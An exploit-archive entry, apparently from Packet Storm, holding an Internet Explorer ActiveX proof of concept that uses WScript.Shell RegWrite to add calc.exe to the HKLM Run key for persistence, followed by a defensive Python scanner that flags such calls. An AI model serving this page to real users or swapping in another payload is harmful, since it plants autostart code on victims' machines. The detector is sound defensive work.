Internet Explorer wshom.ocx Active-X Insecure Method

2010-01-17T00:00:00
ID PACKETSTORM:85283
Type packetstorm
Reporter D3V!L FucK3r
Modified 2010-01-17T00:00:00

Description

                                        
                                            `==============================================================================  
IN THE NAME OF ALLAH  
  
  
==============================================================================  
#Exploit title:0-day Internet Explorer ActiveX remote code Execution 2 (insecure method)  
#version: all versions  
#Author: [D3V!L FUCKER & germaya_x]  
#special thanx: [for my best friend his0k4].  
#Geetz [2] :[Sarbot511 ,thrid-devil ,ahwak2000].  
#tested on : windows 7 , windows vista ,windows xp sp2  
#n0te: to use it, run it and then restart the computer; once it starts up, calc.exe will be shown  
==============================================================================  
<html>  
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>  
<script language='vbscript'>  
  
targetFile = "c:\WINDOWS\system32\wshom.ocx"  
prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )"  
memberName = "RegWrite"  
progid = "IWshRuntimeLibrary.IWshShell_Class"  
argCount = 3  
  
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"  
germaya_x="C:\WINDOWS\system32\calc.exe"  
his0k4="REG_SZ"  
  
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4  
  
</script>  
`
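
A defender-side check for the pattern this PoC uses, as an added example that is not part of the original advisory: it scans page source for an object tag carrying the WScript.Shell CLSID shown above and reports RegWrite calls on that object, flagging keys under an autostart location. The sample input is constructed (placeholder variable names and value), and the function names and the autostart key list are assumptions of the example.

```python
import re

# CLSID the page's PoC instantiates (WScript.Shell, implemented in wshom.ocx).
WSH_CLSID = "f935dc22-1cf0-11d0-adb9-00c04fd58a0b"
# Autostart keys to flag; this list is an assumption of the example.
AUTORUN_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices)(\\|$)", re.I)
OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*(['"]?)([^'"\s>]+)\2""", re.I)
ASSIGN_RE = re.compile(r'^[ \t]*([A-Za-z_]\w*)[ \t]*=[ \t]*"([^"]*)"[ \t\r]*$', re.M)

# Constructed sample modelled on the PoC; variable names and value are placeholders.
SAMPLE = r'''<html>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target'></object>
<script language='vbscript'>
regKey = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
regValue = "C:\placeholder\example.exe"
target.RegWrite regKey ,regValue ,"REG_SZ"
</script>
</html>'''


def wsh_object_ids(html):
    """Return the ids of <object> tags whose classid is the WScript.Shell CLSID."""
    ids = []
    for tag in OBJECT_RE.findall(html):
        attrs = {name.lower(): value for name, _, value in ATTR_RE.findall(tag)}
        clsid = attrs.get("classid", "").lower().replace("clsid:", "").strip("{}")
        if clsid == WSH_CLSID and "id" in attrs:
            ids.append(attrs["id"])
    return ids


def scan(html):
    """List RegWrite calls made on a WScript.Shell object and flag autostart keys."""
    # VBScript is case-insensitive, so variable names are compared in lower case.
    variables = {name.lower(): value for name, value in ASSIGN_RE.findall(html)}
    findings = []
    for obj_id in wsh_object_ids(html):
        call_re = re.compile(r"\b%s\.RegWrite\b[ \t]*\(?([^\r\n]*)" % re.escape(obj_id), re.I)
        for match in call_re.finditer(html):
            first = match.group(1).split(",")[0].strip()
            # First argument is either a string literal or a variable set earlier.
            key = first.strip('"') if first.startswith('"') else variables.get(first.lower(), "")
            findings.append({"object": obj_id, "key": key, "autorun": bool(AUTORUN_RE.search(key))})
    return findings


if __name__ == "__main__":
    print(scan(SAMPLE))
```

The scanner resolves only simple string assignments and literals, so an empty key in a finding means the first argument was built some other way and the call still deserves a manual look.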